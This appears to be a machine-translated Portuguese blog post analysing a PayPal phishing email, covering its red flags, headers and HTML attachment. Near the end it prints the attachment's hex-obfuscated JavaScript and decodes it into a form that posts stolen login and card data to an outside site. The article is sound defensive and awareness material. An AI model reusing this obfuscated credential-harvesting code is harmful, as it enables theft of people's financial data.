10Sep
No mundo de hoje, onde a informação de todos está online, o phishing é um dos ataques online mais populares e devastadores, porque você sempre pode limpar um vírus, mas se seus dados bancários são roubados, você está com problemas. Aqui está uma quebra de um desses ataques que recebemos.
Não pense que são apenas os seus dados bancários importantes: afinal, se alguém ganha controle sobre o login da sua conta, eles não só conhecem as informações contidas nessa conta, mas as chances são de que as mesmas informações de login podem ser usadas em váriosoutras contas. E se eles comprometerem sua conta de e-mail, eles podem redefinir todas as suas outras senhas.
Então, além de manter senhas fortes e variadas, você sempre deve estar à procura de e-mails falsos que se encobrem como coisa real. Enquanto a maioria das tentativas de phishing são amadoras, algumas são bastante convincentes, então é importante entender como reconhecê-las ao nível da superfície, bem como como funcionam sob o capô.
Imagem por asirap
Examinando o que é em visão simples
Nosso exemplo de e-mail, como a maioria das tentativas de phishing, "notifica" você de atividade em sua conta do PayPal que, em circunstâncias normais, seria alarmante. Portanto, a chamada para ação é verificar / restaurar sua conta, enviando apenas sobre cada uma das informações pessoais que você possa pensar. Novamente, isso é bastante fórmico.
Embora existam exceções, praticamente todos os e-mails de phishing e scam são carregados com bandeiras vermelhas diretamente na própria mensagem. Mesmo que o texto seja convincente, geralmente você pode encontrar vários erros espalhados por todo o corpo da mensagem, que indicam que a mensagem não é legítima.
O corpo da mensagem
À primeira vista, este é um dos melhores e-mails de phishing que eu vi. Não há erros ortográficos ou gramaticais e a verbiage lê de acordo com o que você poderia esperar. No entanto, existem algumas bandeiras vermelhas que você pode ver quando examinar o conteúdo um pouco mais de perto.
- "Paypal" - O caso correto é "PayPal"( capital P).Você pode ver que ambas as variações são usadas na mensagem. As empresas são muito deliberadas com a marca, por isso é duvidoso que algo assim passaria o processo de prova.
- "permite o ActiveX" - Quantas vezes você viu um negócio baseado na internet legítimo, o tamanho do Paypal usa um componente proprietário que só funciona em um único navegador, especialmente quando eles oferecem suporte a vários navegadores? Claro, em algum lugar lá, alguma empresa faz isso, mas esta é uma bandeira vermelha.
- "com segurança". - Observe como esta palavra não se alinha na margem com o resto do texto do parágrafo. Mesmo que eu estique a janela um pouco mais, não envolve ou espaço corretamente.
- "Paypal!" - O espaço antes do ponto de exclamação parece estranho. Apenas um outro quirk que tenho certeza não estaria em um e-mail legítimo.
- "PayPal - Atualização da conta Form.pdf.htm" - Por que Paypal anexaria um "PDF", especialmente quando eles poderiam apenas vincular a uma página em seu site? Além disso, por que eles tentariam disfarçar um arquivo HTML como PDF?Esta é a maior bandeira vermelha de todos eles.
O cabeçalho da mensagem
Quando você verifica o cabeçalho da mensagem, aparecerão mais algumas bandeiras vermelhas:
- O endereço do endereço é [email protected].
- O endereço está faltando. Eu não esqueci isso, simplesmente não faz parte do cabeçalho da mensagem padrão. Normalmente, uma empresa que tenha seu nome irá personalizar o e-mail para você.
O anexo
Quando eu abrir o anexo, você pode ver imediatamente que o layout não está correto porque falta informação de estilo. Mais uma vez, por que o PayPal enviaria um formulário HTML por e-mail quando eles simplesmente poderiam dar-lhe um link em seu site?
Nota: usamos o visualizador de anexos HTML incorporado do Gmail para isso, mas recomendamos que NÃO ABRA os anexos de golpistas. Nunca. Sempre. Eles muitas vezes contêm explorações que irão instalar trojans no seu PC para roubar as informações da sua conta.
Deslocando um pouco mais, você pode ver que este formulário solicita não apenas as nossas informações de login do PayPal, mas também informações bancárias e de cartão de crédito. Algumas das imagens estão quebradas.
É óbvio que esta tentativa de phishing vai depois de tudo de uma só vez.
A desagregação técnica
Embora seja bastante claro com base no que está à vista de que esta é uma tentativa de phishing, agora vamos quebrar a composição técnica do e-mail e ver o que podemos encontrar.
Informações do Anexo
A primeira coisa a ter em vista é a fonte HTML do formulário de anexo que é o que envia os dados ao site falso.
Ao visualizar rapidamente a fonte, todos os links aparecem válidos à medida que indicam "paypal.com" ou "paypalobjects.com" que são legítimos.
Agora vamos dar uma olhada em algumas informações básicas da página que o Firefox se reúne na página.
Como você pode ver, alguns dos gráficos são retirados dos domínios "blessedtobe.com", "goodhealthpharmacy.com" e "pic-upload.de" em vez dos legítimos dominios do PayPal.
Informações dos cabeçalhos de email
Em seguida, daremos uma olhada nos cabeçalhos de mensagens de e-mail brutos. O Gmail disponibiliza isso através da opção de menu Mostrar original na mensagem.
Olhando para as informações do cabeçalho para a mensagem original, você pode ver esta mensagem foi composta usando o Outlook Express 6. Eu duvido que o PayPal tenha alguém na equipe que envia cada uma dessas mensagens manualmente por meio de um cliente de e-mail desatualizado.
Agora, olhando as informações de roteamento, podemos ver o endereço IP do remetente e do servidor de retransmissão.
O endereço IP "Usuário" é o remetente original. Fazendo uma pesquisa rápida sobre as informações de IP, podemos ver o IP de envio na Alemanha.
E quando olhamos para o servidor de correio de retransmissão( mail.itak.at), o endereço IP, podemos ver que este é um ISP baseado na Áustria. Eu duvido que o PayPal encaminhe seus e-mails diretamente através de um ISP baseado na Áustria quando eles tiverem um enorme farm de servidores que poderia facilmente lidar com essa tarefa.
Onde os Dados Vem?
Então, nós determinamos claramente que este é um e-mail de phishing e reuniu algumas informações sobre a origem da mensagem, mas sobre o local onde seus dados são enviados?
Para ver isso, primeiro devemos salvar o anexo HTM da nossa área de trabalho e abrir um editor de texto. Deslocando-o, tudo parece estar em ordem, exceto quando chegarmos a um bloqueio de Javascript suspeito.
Rompendo a fonte completa do último bloco de Javascript, vemos:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// de Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Sempre que você vê uma grande série de letras aparentemente aleatórias e números embutidos em um bloco Javascript, normalmente é algo suspeito. Olhando para o código, a variável "x" é configurada para esta cadeia grande e depois descodificada na variável "y".O resultado final da variável "y" é então escrito no documento como HTML.
Desde o grande cadeia é feita de números 0-9 e as letras AF, é mais provável codificado através de um ASCII simples de conversão de Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Traduz para:
& lt; form name =”main” id =”main”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Não é uma coincidência que isso decodifique em uma etiqueta de formulário HTML válida que envia os resultados para o PayPal, mas para um site desonesto.
Além disso, quando você visualiza a fonte HTML do formulário, você verá que esta etiqueta de formulário não está visível porque ela é gerada dinamicamente através do Javascript. Esta é uma maneira inteligente de esconder o que o HTML está realmente fazendo se alguém simplesmente visse a fonte gerada do anexo( como fizemos anteriormente) em oposição à abertura do anexo diretamente em um editor de texto.
Executando um whois rápido no site ofensivo, podemos ver que este é um domínio hospedado em um host popular, 1and1.
O que se destaca é que o domínio usa um nome legível( em oposição a algo como "dfh3sjhskjhw.net") e o domínio foi registrado há 4 anos. Por causa disso, acredito que este domínio foi seqüestrado e usado como um peão nesta tentativa de phishing.
O cinismo é uma boa defesa
Quando se trata de se manter seguro on-line, nunca dói ter um pouco de cinismo.
Embora eu tenha certeza de que há mais bandeiras vermelhas no exemplo de e-mail, o que temos apontado acima são indicadores que vimos após apenas alguns minutos de exame. Hipoteticamente, se o nível de superfície do e-mail imitasse sua contraparte legítima 100%, a análise técnica ainda revelaria sua verdadeira natureza.É por isso que é importante poder examinar tanto o que você pode e não pode ver.